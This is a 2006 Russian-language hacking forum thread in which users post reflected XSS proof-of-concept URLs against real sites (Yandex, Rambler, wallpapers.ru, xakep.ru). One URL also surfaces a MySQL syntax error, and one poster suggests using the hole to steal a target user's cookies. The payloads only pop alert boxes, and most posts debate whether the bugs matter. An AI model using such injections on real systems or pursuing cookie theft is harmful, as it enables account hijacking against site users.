XSS на Yandex.RU

Discussion in 'Уязвимости' started by Gang100, 8 Apr 2006.

Thread Status:
Not open for further replies.
  1. Gang100

    Gang100 Banned

    Joined:
    18 Feb 2006
    Messages:
    32
    Likes Received:
    24
    Reputations:
    21
    Нашел XSS на Яндексе (IE)

    _http://www.yandex.ru/yandsearch?Link="><script>alert('found_by_Gang100')</script>
     
    #1 Gang100, 8 Apr 2006
    Last edited: 8 Apr 2006
  2. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    На ФФ не работает :)
     
  3. member_ru

    member_ru Elder - Старейшина

    Joined:
    8 Dec 2005
    Messages:
    46
    Likes Received:
    3
    Reputations:
    0
    Чёт и у меня не пашет, пофиксили что-ли уже ?
     
  4. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    как сказал маленький литовский мальчик: "ну и что?" +))
    их там сотни
    в опере тоже не работает...
     
  5. Gang100

    Gang100 Banned

    Joined:
    18 Feb 2006
    Messages:
    32
    Likes Received:
    24
    Reputations:
    21
    мда-пс работает только в Ie
     
  6. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    И на Рамблере :)
    http://www.rambler.ru/cgi-bin/advanced.cgi?set="><script>alert('found_by_Gavrila')</script>
     
  7. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    XSS на популярном портале))

    http://wallpapers.ru/cgi-bin/forum/top.pl?author="><script>alert('xss')</script>

    + выдаётся ссобщение

    Временные неполадки на сервере баз данных (MySQL)
    На сервере баз данных возникли временные неполадки.
    Причина: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'xss')' AND icon_autor >= 2' at line
     
    _________________________
  8. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Большинство пассивных хсс мультибраузерные. Так же как и эти. (_|_)

    На самом деле и на яндексе и на рамблере есть простые мультибраузерные активные хсс, не страдайте ***ней!
     
  9. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    http://www.xakep.ru/post/30551/default.asp?"></iframe><script>alert(/xss/)</script><xexe="
    такаяже байда точно такая же пасивная и чего?
     
  10. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    как что?! АКОШКА ВЫСКАЧЕЛО! Я ХАЦКНУЛ ХАЦКЕР! :]
     
  11. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Кстати XSS про yandex.ru мишка давно находил её даже вроде статью делал.
     
  12. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Снимать штаны и бегать... Шутка.ПОпробуй стырить куки у пользваотеля которого хочешь взломать.
     
  13. iNcluDe

    iNcluDe New Member

    Joined:
    7 Mar 2006
    Messages:
    9
    Likes Received:
    2
    Reputations:
    2
    По моему от этого бага толка нет, нафига его вообще публиковать %)
    Вот например на на античате тоже баг есть, не XSS но есть

    Warning: Wrong parameter count for mysql_result() in z:\home\video.antichat.net\www\index.php on line 26

    Warning: Wrong parameter count for mysql_result() in z:\home\video.antichat.net\www\index.php on line 26

    Толку от него нет.

    В общем я думаю не стоит публиковать баги, от которых толку нет
     
  14. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Не думаю что после алерта можно считать yandex взломаным, а базу слитой...

    [что, я лоханулся опять, да?]
     
    #14 KEZ, 9 Apr 2006
    Last edited: 9 Apr 2006
  15. member_ru

    member_ru Elder - Старейшина

    Joined:
    8 Dec 2005
    Messages:
    46
    Likes Received:
    3
    Reputations:
    0
    iNcluDe, эта бага расскрытия пути :)
     
  16. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    да клоуны ерундой не майтесь плизз.
     
    1 person likes this.
  17. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    это как сказано в одном фильме трактористов разводить :)))))))
     
  18. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    ёпт, скоро раз обсуждали этот вопрос.. это не бага, это Задохлик прикалывается.. =)
     
  19. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    какой z: +))))) развод это все)
    античат вообще в /usr/home/host[****]/domains насколько я помню
     
  20. iNcluDe

    iNcluDe New Member

    Joined:
    7 Mar 2006
    Messages:
    9
    Likes Received:
    2
    Reputations:
    2
    Я и сам знаю =))
    Это даже багом назвать трудно

    Это я так, к примеру привел
     
Thread Status:
Not open for further replies.